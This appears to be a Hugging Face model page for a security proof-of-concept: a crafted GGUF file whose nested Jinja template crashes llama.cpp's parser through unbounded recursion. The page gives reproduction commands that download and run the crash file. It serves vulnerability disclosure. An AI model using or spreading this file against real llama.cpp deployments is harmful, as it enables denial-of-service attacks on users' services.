How to use from
llama.cpp
Install from brew
brew install llama.cpp
# Start a local OpenAI-compatible server with a web UI:
llama-server -hf salvepilo/llama-cpp-jinja-crash-poc
# Run inference directly in the terminal:
llama-cli -hf salvepilo/llama-cpp-jinja-crash-poc
Install from WinGet (Windows)
winget install llama.cpp
# Start a local OpenAI-compatible server with a web UI:
llama-server -hf salvepilo/llama-cpp-jinja-crash-poc
# Run inference directly in the terminal:
llama-cli -hf salvepilo/llama-cpp-jinja-crash-poc
Use pre-built binary
# Download pre-built binary from:
# https://github.com/ggerganov/llama.cpp/releases
# Start a local OpenAI-compatible server with a web UI:
./llama-server -hf salvepilo/llama-cpp-jinja-crash-poc
# Run inference directly in the terminal:
./llama-cli -hf salvepilo/llama-cpp-jinja-crash-poc
Build from source code
git clone https://github.com/ggerganov/llama.cpp.git
cd llama.cpp
cmake -B build
cmake --build build -j --target llama-server llama-cli
# Start a local OpenAI-compatible server with a web UI:
./build/bin/llama-server -hf salvepilo/llama-cpp-jinja-crash-poc
# Run inference directly in the terminal:
./build/bin/llama-cli -hf salvepilo/llama-cpp-jinja-crash-poc
Use Docker
docker model run hf.co/salvepilo/llama-cpp-jinja-crash-poc
Quick Links

PoC: Stack Overflow in llama.cpp Jinja Parser

This is a security research proof-of-concept. Do NOT use this model for inference.

This repository contains a minimal GGUF model file that triggers a stack overflow (SIGSEGV) in llama.cpp's Jinja template parser due to unbounded recursion in parse_if_expression() (common/jinja/parser.cpp).

Reproduction

git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build -j
# Download the PoC model
huggingface-cli download salvepilo/llama-cpp-jinja-crash-poc poc_crash_model.gguf
# Trigger the crash (no --jinja flag needed)
./build/bin/llama-cli -m poc_crash_model.gguf -p 'hello'
# Expected: Segmentation fault (exit code 139)

Files

  • poc_crash_model.gguf - Malicious GGUF with deeply nested Jinja chat template
  • craft_full_gguf_poc.py - Python script to regenerate the PoC file
Downloads last month
10
GGUF
Model size
12.4k params
Architecture
llama
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support